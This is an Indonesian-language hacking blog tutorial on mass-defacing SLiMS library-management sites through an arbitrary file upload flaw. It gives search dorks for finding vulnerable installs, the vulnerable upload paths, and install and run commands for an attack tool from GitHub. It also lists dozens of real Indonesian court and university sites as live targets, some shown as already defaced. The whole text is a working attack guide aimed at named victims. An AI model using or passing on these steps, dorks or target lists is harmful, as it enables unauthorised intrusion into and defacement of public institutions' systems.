Deface Poc Slims CMS Senayan Arbitrary File Upload (Mass Remote Path)

Baca Juga

Assalamualaikum Brother

Oke Bro Kali Ini Gwe Alan Kasih Cara Deface Poc Slims CMS Senayan Arbitrary File Upload (Mass Remote Path) deface ini sangat mudah Dan bisa dijalankan melalui terminal kamu seperti termux,Linux,cmd dll...

Oke Langsung Saja Ke caranya...

Bahan-Bahan :

# Hp/Pc

# Internet

# Otak

# Sabar

# Dork

# Terminal

# Exploit

# Sc Deface

Dork All 15+ :

# intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''

# inurl:''index.php?p=show_detail&id='' site:id

# inurl:''/slims5-meranti/'' site:id

# intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''

# Powered by SLiMS site:id

# Powered by SLiMS | Design by Indra Sutriadi Pipii

# Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. 

# Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog.

# SLiMS (Senayan Library Management System) is an open source Library Management System. 

  It is build on Open source technology like PHP and MySQL.

# PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly

# This software and this template are released Under GNU GPL License Version 3

# inurl:''/index.php?select_lang='' site:sch.id

# Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog

# Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library.

# O.P.A.C. (On-line Public Access Catalogue)

# inurl:''/perpustakaan/repository/'' site:id

# Senayan | Open Source Library Management System :: OPAC 

Kamu pilih aja dork yang kamu mau...

Xploit : (Untuk Xploitnya Saya Kasih Banyak Disini Kamu Bisa Coba Yang Vuln Untuk Web Target Kamu)

admin/modules/bibliography/pop_attach.php

ghmclib/admin/modules/bibliography/pop_attach.php

admin/modules/bibliography/pop_attach.php?biblioID=0

katalog//admin/modules/bibliography/pop_attach.php

Berubung Gwe baik hehe maka aku kasih live target hehe..

Live Target :

http://pa-purwodadi.go.id/katalog/admin/modules/bibliography/pop_attach.php

Jika kamu sudah kasih exploit lalu berubah seperti ini itu tandanya vuln.. Langsung Saja salin URL nya :V

Oke langsung saja disini kita pakai tools buatan odiq & temanku alqiyaramdana , bisa di pakai di termux/linux/cmd

Install Tools :

pkg update && pkg upgrade

pkg install python2

pkg install pip2

pip2 install colorama

pip2 install bs4

pip2 install requests

pkg install git

git clone https://github.com/JawaTengahXploit1337/slimass

cd slimass

Kalau udah selesai semua tinggal buat file deface txt kamu..

Ketik nano file defacemu.txt 

nano iyo.txt (punya ./W4D3R)

Isi file defacemu seperti ini (contoh)

Nah jika sudah kamu ketik aja control + x lalu y jika sudah kamu ketik lagi

python2  slim.py iyo.txt (nama file kamu)

lalu enter

Nah kamu masukin URL target yang vuln tadi lalu enter..

Nah dah kedeface

Hasil Depes :

http://www.pa-purwodadi.go.id/iyo.txt

http://sipp.pa-purwodadi.go.id/iyo.txt

http://e-tara.pa-purwodadi.go.id/iyo.txt

http://arsip.pa-purwodadi.go.id/iyo.txt

http://awan.pa-purwodadi.go.id/iyo.txt

Poc? Slims CMS

Live Target Borr :

http://www.pn-kebumen.go.id

http://sipp.pn-kebumen.go.id

http://perpustakaan.pn-kebumen.go.id

http://tilang.pn-kebumen.go.id

http://jurnal.alazhar-university.ac.id

http://feeder.stikeshamzar.ac.id

http://www.stiebbank.ac.id

http://ecampus.stiebbank.ac.id

http://edu.stiebbank.ac.id

http://sacti.stiebbank.ac.id

http://ebbank.stiebbank.ac.id

http://pmb.stiebbank.ac.id

http://www.poltekkesbanten.ac.id

http://sipenmaru.poltekkesbanten.ac.id

http://perpustakaan.poltekkesbanten.ac.id

http://tlm.poltekkesbanten.ac.id

http://kebidanan.poltekkesbanten.ac.id

http://pmdp.poltekkesbanten.ac.id

http://jurnal.poltekkesbanten.ac.id

http://www.pa-muarabungo.go.id

http://pustaka.pa-muarabungo.go.id

http://perkara.pa-muarabungo.go.id

http://sipp.pa-muarabungo.go.id

http://siakad.stikmuhptk.ac.id

http://www.pn-lhokseumawe.go.id

http://eskum.pn-lhokseumawe.go.id

http://arsip.pn-lhokseumawe.go.id

http://ayahcut.pn-lhokseumawe.go.id

http://websipp.pn-lhokseumawe.go.id

http://absen.pn-lhokseumawe.go.id

http://sipk.pn-lhokseumawe.go.id

http://siapbang.pn-lhokseumawe.go.id

http://pustaka.pn-lhokseumawe.go.id

http://jdih.pn-lhokseumawe.go.id

http://awasbang.pn-lhokseumawe.go.id

http://sikm.pn-lhokseumawe.go.id

http://survey.pn-lhokseumawe.go.id

http://sipak.pn-lhokseumawe.go.id

http://www.stiebbank.ac.id

http://ecampus.stiebbank.ac.id

http://edu.stiebbank.ac.id

http://sacti.stiebbank.ac.id

http://ebbank.stiebbank.ac.id

http://pmb.stiebbank.ac.id

http://taxcenter.stiebbank.ac.id

http://alumni.stiebbank.ac.id

http://kelaskaryawan.stiebbank.ac.id

http://lomba.stiebbank.ac.id

http://perpustakaan.stiebbank.ac.id

http://kampus.stiebbank.ac.id

http://penting.stiebbank.ac.id

http://sungkono.stiebbank.ac.id

Selamat mencoba semoga berhasil

Support By : http://www.sukabumiblackhat.my.id

Jangan Lupa Tingalkan Jejakmu Di Komentar

Atau Kurang Paham Komen Aja Broo..

Trimaksih :v